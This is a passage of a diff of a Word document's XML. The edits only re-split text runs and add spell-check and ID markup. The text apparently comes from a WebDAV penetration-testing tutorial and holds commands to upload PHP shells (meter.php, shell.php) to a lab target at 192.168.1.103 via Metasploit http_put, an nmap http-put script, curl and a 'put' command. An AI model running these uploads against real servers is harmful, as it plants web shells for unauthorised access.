+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17556,14 +19923,52 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; set filename meter.php</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) &gt; set filename </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>meter.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17579,13 +19984,59 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; set filedata file://root/Desktop/meter.php</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) &gt; set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>filedata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file://root/Desktop/meter.php</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17602,13 +20053,41 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; exploit</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>) &gt; exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17652,13 +20131,32 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nmap -p 80 192.168.1.103 --scr</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p 80 192.168.1.103 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17674,7 +20172,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t http-put --scr</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http-put --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17690,7 +20206,34 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>t-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'</w:t>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-args http-put.url='/dav/nmap.php</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>',http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-put.file='/root/Desktop/nmap.php'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17740,7 +20283,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>curl http://192.168.1.103/dav/ --upload-file /root/Desktop/curl.php -v</w:t>
+        <w:t>curl http://192.168.1.103/dav/ --upload-file /root/Desktop/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>curl.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17759,6 +20320,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
@@ -17769,6 +20331,7 @@
         </w:rPr>
         <w:t>Burpsuite</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17886,8 +20449,36 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Now once we are inside the victim’s directory, upload the file shell.php from the Desktop to the target machine’s path, by executing the below command :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Now once we are inside the victim’s directory, upload the file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from the Desktop to the target machine’s path, by executing the below </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>command :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17909,8 +20500,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>put /root/Desktop/shell.php</w:t>
-      </w:r>
+        <w:t>put /root/Desktop/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18048,7 +20649,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="04125872"/>
     <w:multiLevelType w:val="multilevel"/>
@@ -21078,73 +23679,73 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="587537689">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="2" w16cid:durableId="853307643">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="3" w16cid:durableId="1532647294">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="4" w16cid:durableId="1499925442">
     <w:abstractNumId w:val="16"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="5" w16cid:durableId="1445882705">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="6">
+  <w:num w:numId="6" w16cid:durableId="1972854920">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="7">
+  <w:num w:numId="7" w16cid:durableId="641737856">
     <w:abstractNumId w:val="19"/>
   </w:num>
-  <w:num w:numId="8">
+  <w:num w:numId="8" w16cid:durableId="1289898477">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="9">
+  <w:num w:numId="9" w16cid:durableId="1125927174">
     <w:abstractNumId w:val="18"/>
   </w:num>
-  <w:num w:numId="10">
+  <w:num w:numId="10" w16cid:durableId="1223636627">
     <w:abstractNumId w:val="15"/>
   </w:num>
-  <w:num w:numId="11">
+  <w:num w:numId="11" w16cid:durableId="1735008148">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="12">
+  <w:num w:numId="12" w16cid:durableId="1031498352">
     <w:abstractNumId w:val="22"/>
   </w:num>
-  <w:num w:numId="13">
+  <w:num w:numId="13" w16cid:durableId="561645279">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="14">
+  <w:num w:numId="14" w16cid:durableId="471756594">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="15">
+  <w:num w:numId="15" w16cid:durableId="1568763140">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="16">
+  <w:num w:numId="16" w16cid:durableId="737290859">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="17">
+  <w:num w:numId="17" w16cid:durableId="356736655">
     <w:abstractNumId w:val="20"/>
   </w:num>
-  <w:num w:numId="18">
+  <w:num w:numId="18" w16cid:durableId="1520853128">
     <w:abstractNumId w:val="21"/>
   </w:num>
-  <w:num w:numId="19">
+  <w:num w:numId="19" w16cid:durableId="324671575">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="20">
+  <w:num w:numId="20" w16cid:durableId="564879504">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="21">
+  <w:num w:numId="21" w16cid:durableId="1411583913">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="22">
+  <w:num w:numId="22" w16cid:durableId="1889760368">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="23">
+  <w:num w:numId="23" w16cid:durableId="422068270">
     <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>

</xml_diff>